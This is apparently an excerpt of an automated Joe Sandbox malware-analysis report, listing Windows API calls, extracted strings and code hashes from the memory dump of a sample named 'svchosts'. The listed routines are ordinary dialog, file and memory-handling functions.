                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 42c24a0497664c04da88f7601574bad9002824c7a856f50f86de3839d36f4d36
                                                                      • Instruction ID: 32db86f3fcc07c828c0e0eea3392498751cb3eb41e57210a07f89da2e994b83d
                                                                      • Opcode Fuzzy Hash: 42c24a0497664c04da88f7601574bad9002824c7a856f50f86de3839d36f4d36
                                                                      • Instruction Fuzzy Hash: 4FA011AA2BC002BE300822802C0BE3B022CC0CAF203308E0EF00BC0880AE800C3A0830
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002ADC36
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: cc28fabe29f999f2e2f7cc2f72a086048791ab4ceb52a3fe846861e9e3624d08
                                                                      • Instruction ID: aeb3fdfd6ac10d2fbe9a7a36cac468d8a0d2355b96927af17a09911bc7595d86
                                                                      • Opcode Fuzzy Hash: cc28fabe29f999f2e2f7cc2f72a086048791ab4ceb52a3fe846861e9e3624d08
                                                                      • Instruction Fuzzy Hash: C4A0129917C1027D300C31102C03E37022CC0C2F20370490EF007D08419DC01C244430
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 002ADC36
                                                                        • Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
                                                                        • Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 4e2596788143ff9c27d2e4996efed90415c3324bce4e56aeec65fb6b6ab95a9f
                                                                      • Instruction ID: aeb3fdfd6ac10d2fbe9a7a36cac468d8a0d2355b96927af17a09911bc7595d86
                                                                      • Opcode Fuzzy Hash: 4e2596788143ff9c27d2e4996efed90415c3324bce4e56aeec65fb6b6ab95a9f
                                                                      • Instruction Fuzzy Hash: C4A0129917C1027D300C31102C03E37022CC0C2F20370490EF007D08419DC01C244430
                                                                      APIs
                                                                      • SetCurrentDirectoryW.KERNELBASE(?,002AA587,C:\Users\user\Desktop,00000000,002D946A,00000006), ref: 002AA326
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory
                                                                      • String ID:
                                                                      • API String ID: 1611563598-0
                                                                      • Opcode ID: 32ea30811227462d4aecab7f95f35f49fdcf853a095f6653b7f50a9faaac8b20
                                                                      • Instruction ID: 2352e63cd67d5e5c1560755f3674b57aa4b2c394b958750cb07fde0dcf7dffe3
                                                                      • Opcode Fuzzy Hash: 32ea30811227462d4aecab7f95f35f49fdcf853a095f6653b7f50a9faaac8b20
                                                                      • Instruction Fuzzy Hash: FAA012301940065A8E004B30DC0DC1576505760702F00CA20700AC00A0CB30C814A500
                                                                      APIs
                                                                        • Part of subcall function 0029130B: GetDlgItem.USER32(00000000,00003021), ref: 0029134F
                                                                        • Part of subcall function 0029130B: SetWindowTextW.USER32(00000000,002C35B4), ref: 00291365
                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 002AB971
                                                                      • EndDialog.USER32(?,00000006), ref: 002AB984
                                                                      • GetDlgItem.USER32(?,0000006C), ref: 002AB9A0
                                                                      • SetFocus.USER32(00000000), ref: 002AB9A7
                                                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 002AB9E1
                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 002ABA18
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 002ABA2E
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002ABA4C
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 002ABA5C
                                                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 002ABA78
                                                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 002ABA94
                                                                      • _swprintf.LIBCMT ref: 002ABAC4
                                                                        • Part of subcall function 0029400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0029401D
                                                                      • SetDlgItemTextW.USER32(?,0000006A,?), ref: 002ABAD7
                                                                      • FindClose.KERNEL32(00000000), ref: 002ABADE
                                                                      • _swprintf.LIBCMT ref: 002ABB37
                                                                      • SetDlgItemTextW.USER32(?,00000068,?), ref: 002ABB4A
                                                                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 002ABB67
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 002ABB87
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 002ABB97
                                                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 002ABBB1
                                                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 002ABBC9
                                                                      • _swprintf.LIBCMT ref: 002ABBF5
                                                                      • SetDlgItemTextW.USER32(?,0000006B,?), ref: 002ABC08
                                                                      • _swprintf.LIBCMT ref: 002ABC5C
                                                                      • SetDlgItemTextW.USER32(?,00000069,?), ref: 002ABC6F
                                                                        • Part of subcall function 002AA63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 002AA662
                                                                        • Part of subcall function 002AA63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,002CE600,?,?), ref: 002AA6B1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                      • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                      • API String ID: 797121971-1840816070
                                                                      • Opcode ID: fa5f6c4e090099eefd1ba349ae9dda09947d3406983c8cf3ea274bd10f9387db
                                                                      • Instruction ID: a6ee6d7cf28412b584ab721a779c12c38874742031b7f7d5a9a5feded7bff1ad
                                                                      • Opcode Fuzzy Hash: fa5f6c4e090099eefd1ba349ae9dda09947d3406983c8cf3ea274bd10f9387db
                                                                      • Instruction Fuzzy Hash: A791B0B2158349BFD621DBA0DD49FFB77ACEB4B700F044819B749D2092DB71AA14CB62
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00297191
                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 002972F1
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00297301
                                                                        • Part of subcall function 00297BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00297C04
                                                                        • Part of subcall function 00297BF5: GetLastError.KERNEL32 ref: 00297C4A
                                                                        • Part of subcall function 00297BF5: CloseHandle.KERNEL32(?), ref: 00297C59
                                                                      • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0029730C
                                                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0029741A
                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00297446
                                                                      • CloseHandle.KERNEL32(?), ref: 00297457
                                                                      • GetLastError.KERNEL32 ref: 00297467
                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 002974B3
                                                                      • DeleteFileW.KERNEL32(?), ref: 002974DB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                      • API String ID: 3935142422-3508440684
                                                                      • Opcode ID: 0168e38a11f7dc675484cdd9fd42a5cd5a437ae9a10b18b134ba41083c3fb211
                                                                      • Instruction ID: dce8cbc62e6ad6acd05b2d941ddbc6a65a6f5768df8f5ebf0c50428fefdac9e3
                                                                      • Opcode Fuzzy Hash: 0168e38a11f7dc675484cdd9fd42a5cd5a437ae9a10b18b134ba41083c3fb211
                                                                      • Instruction Fuzzy Hash: AEB1C171924215ABDF20DF64DC85FEEB7B8AF04300F0445A9F949E7142DB34AA59CBA1
                                                                      APIs
                                                                      • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 002AA662
                                                                      • GetNumberFormatW.KERNEL32(00000400,00000000,?,002CE600,?,?), ref: 002AA6B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: FormatInfoLocaleNumber
                                                                      • String ID:
                                                                      • API String ID: 2169056816-0
                                                                      • Opcode ID: e1156655581cc2455eb500ebc7cf00f805dc2ced34680ae66668fcb8d93fef2c
                                                                      • Instruction ID: 94cc3b3555d7bc207a445f45446f9bbcdd3808328835620f3299d45af6614f1a
                                                                      • Opcode Fuzzy Hash: e1156655581cc2455eb500ebc7cf00f805dc2ced34680ae66668fcb8d93fef2c
                                                                      • Instruction Fuzzy Hash: C5015A36560248BFDF10DFA4EC49FAB77BCEF19710F115822FA0997150D7709A248BA5
                                                                      APIs
                                                                      • GetVersionExW.KERNEL32(?), ref: 0029AD1A
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: Version
                                                                      • String ID:
                                                                      • API String ID: 1889659487-0
                                                                      • Opcode ID: ab723ed88b08d3fc26ca8c14c571035f74cb05417fe149f751627356192b0e35
                                                                      • Instruction ID: fe6c4173e900a261b517832249547b14a07338e3cdac839115aff8c72edf8c40
                                                                      • Opcode Fuzzy Hash: ab723ed88b08d3fc26ca8c14c571035f74cb05417fe149f751627356192b0e35
                                                                      • Instruction Fuzzy Hash: 94F06DB0D0030C8FCB28CF58FC89AE973B1F749301F200296D918537A4D770AD408EA1
                                                                      APIs
                                                                      • _swprintf.LIBCMT ref: 0029DABE
                                                                        • Part of subcall function 0029400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0029401D
                                                                        • Part of subcall function 002A1596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,002D0EE8,00000200,0029D202,00000000,?,00000050,002D0EE8), ref: 002A15B3
                                                                      • _strlen.LIBCMT ref: 0029DADF
                                                                      • SetDlgItemTextW.USER32(?,002CE154,?), ref: 0029DB3F
                                                                      • GetWindowRect.USER32(?,?), ref: 0029DB79
                                                                      • GetClientRect.USER32(?,?), ref: 0029DB85
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0029DC25
                                                                      • GetWindowRect.USER32(?,?), ref: 0029DC52
                                                                      • SetWindowTextW.USER32(?,?), ref: 0029DC95
                                                                      • GetSystemMetrics.USER32(00000008), ref: 0029DC9D
                                                                      • GetWindow.USER32(?,00000005), ref: 0029DCA8
                                                                      • GetWindowRect.USER32(00000000,?), ref: 0029DCD5
                                                                      • GetWindow.USER32(00000000,00000002), ref: 0029DD47
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                      • String ID: $%s:$CAPTION$T,$d
                                                                      • API String ID: 2407758923-4153203090
                                                                      • Opcode ID: 542093b41f5c96b49bfa90fcfff5b29005379afe3d69cd6edf9256f24268cd36
                                                                      • Instruction ID: 5c1f0111e3ff91970538b32e304ca48be6dc9c965425ac98fa32436478e19aa8
                                                                      • Opcode Fuzzy Hash: 542093b41f5c96b49bfa90fcfff5b29005379afe3d69cd6edf9256f24268cd36
                                                                      • Instruction Fuzzy Hash: 5981B272118301AFDB10DF68DD89F6BBBE9EB89714F04092DFA8893251D670E819CB52
                                                                      APIs
                                                                      • ___free_lconv_mon.LIBCMT ref: 002BC277
                                                                        • Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBE2F
                                                                        • Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBE41
                                                                        • Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBE53
                                                                        • Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBE65
                                                                        • Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBE77
                                                                        • Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBE89
                                                                        • Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBE9B
                                                                        • Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBEAD
                                                                        • Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBEBF
                                                                        • Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBED1
                                                                        • Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBEE3
                                                                        • Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBEF5
                                                                        • Part of subcall function 002BBE12: _free.LIBCMT ref: 002BBF07
                                                                      • _free.LIBCMT ref: 002BC26C
                                                                        • Part of subcall function 002B84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,002BBFA7,?,00000000,?,00000000,?,002BBFCE,?,00000007,?,?,002BC3CB,?), ref: 002B84F4
                                                                        • Part of subcall function 002B84DE: GetLastError.KERNEL32(?,?,002BBFA7,?,00000000,?,00000000,?,002BBFCE,?,00000007,?,?,002BC3CB,?,?), ref: 002B8506
                                                                      • _free.LIBCMT ref: 002BC28E
                                                                      • _free.LIBCMT ref: 002BC2A3
                                                                      • _free.LIBCMT ref: 002BC2AE
                                                                      • _free.LIBCMT ref: 002BC2D0
                                                                      • _free.LIBCMT ref: 002BC2E3
                                                                      • _free.LIBCMT ref: 002BC2F1
                                                                      • _free.LIBCMT ref: 002BC2FC
                                                                      • _free.LIBCMT ref: 002BC334
                                                                      • _free.LIBCMT ref: 002BC33B
                                                                      • _free.LIBCMT ref: 002BC358
                                                                      • _free.LIBCMT ref: 002BC370
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                      • String ID: P,
                                                                      • API String ID: 161543041-3718016131
                                                                      • Opcode ID: 6c923b4c9191b1cc5e575d7cdd21ec042145cd1b8979621b746b34ba5aecf718
                                                                      • Instruction ID: b83fd8a96e224365575deb1fe2dc03b3071599e9c5be2750449be8d90cf831cb
                                                                      • Opcode Fuzzy Hash: 6c923b4c9191b1cc5e575d7cdd21ec042145cd1b8979621b746b34ba5aecf718
                                                                      • Instruction Fuzzy Hash: 7E317E316206069FEB20AE78DA45BDA73E9FF00390F64846AF459D7551EF71ACA0CB50
                                                                      APIs
                                                                      • GetWindow.USER32(?,00000005), ref: 002ACD51
                                                                      • GetClassNameW.USER32(00000000,?,00000800), ref: 002ACD7D
                                                                        • Part of subcall function 002A17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0029BB05,00000000,.exe,?,?,00000800,?,?,002A85DF,?), ref: 002A17C2
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 002ACD99
                                                                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 002ACDB0
                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 002ACDC4
                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 002ACDED
                                                                      • DeleteObject.GDI32(00000000), ref: 002ACDF4
                                                                      • GetWindow.USER32(00000000,00000002), ref: 002ACDFD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                      • String ID: STATIC
                                                                      • API String ID: 3820355801-1882779555
                                                                      • Opcode ID: abdeb9204efdf1bcd7d147cb7cd39134dc1b8b99625e1b0a13a8f67d32ff3f91
                                                                      • Instruction ID: bb28ae95c84e6db127e94594c61e265d55ae4a864af21a9af547c2bf2c48cdfa
                                                                      • Opcode Fuzzy Hash: abdeb9204efdf1bcd7d147cb7cd39134dc1b8b99625e1b0a13a8f67d32ff3f91
                                                                      • Instruction Fuzzy Hash: 07112733151711BBE6206B20AC0DFAF365CEB677A0F104035FA06A5192CF608D69CAA4
                                                                      APIs
                                                                      • _free.LIBCMT ref: 002B8EC5
                                                                        • Part of subcall function 002B84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,002BBFA7,?,00000000,?,00000000,?,002BBFCE,?,00000007,?,?,002BC3CB,?), ref: 002B84F4
                                                                        • Part of subcall function 002B84DE: GetLastError.KERNEL32(?,?,002BBFA7,?,00000000,?,00000000,?,002BBFCE,?,00000007,?,?,002BC3CB,?,?), ref: 002B8506
                                                                      • _free.LIBCMT ref: 002B8ED1
                                                                      • _free.LIBCMT ref: 002B8EDC
                                                                      • _free.LIBCMT ref: 002B8EE7
                                                                      • _free.LIBCMT ref: 002B8EF2
                                                                      • _free.LIBCMT ref: 002B8EFD
                                                                      • _free.LIBCMT ref: 002B8F08
                                                                      • _free.LIBCMT ref: 002B8F13
                                                                      • _free.LIBCMT ref: 002B8F1E
                                                                      • _free.LIBCMT ref: 002B8F2C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: e15b0ea1030b5aa221e017558168141ef39eeb31f68285abd52187dc9f03d664
                                                                      • Instruction ID: fe6e290d28af7d42d7ca8504a307158bd048d467d87828084cdb089aa63ffafc
                                                                      • Opcode Fuzzy Hash: e15b0ea1030b5aa221e017558168141ef39eeb31f68285abd52187dc9f03d664
                                                                      • Instruction Fuzzy Hash: C011747652010DAFCB11EF54CA42CDA3BB9FF04390B5141A5BA0C8B666EA31EE61DF80
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
